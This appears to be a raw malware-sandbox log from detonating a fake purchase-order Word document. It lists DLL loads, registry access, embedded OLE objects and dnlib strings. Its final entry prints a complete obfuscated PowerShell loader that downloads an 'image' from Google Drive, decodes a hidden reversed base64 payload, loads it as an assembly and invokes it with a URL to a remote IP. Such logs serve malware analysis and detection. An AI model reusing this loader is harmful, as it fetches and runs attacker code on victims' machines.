                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: PO NAHK22012FA00000.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\PO NAHK22012FA00000.docx.doc
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject3.bin
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/media/image3.emf
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject2.bin
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/media/image2.emf
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/media/image3.emf
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/embeddings/oleObject3.bin
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/media/image2.emf
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/embeddings/oleObject2.bin
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE summary template = 54D5D963
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17a source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: PO NAHK22012FA00000.docx.doc Initial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, 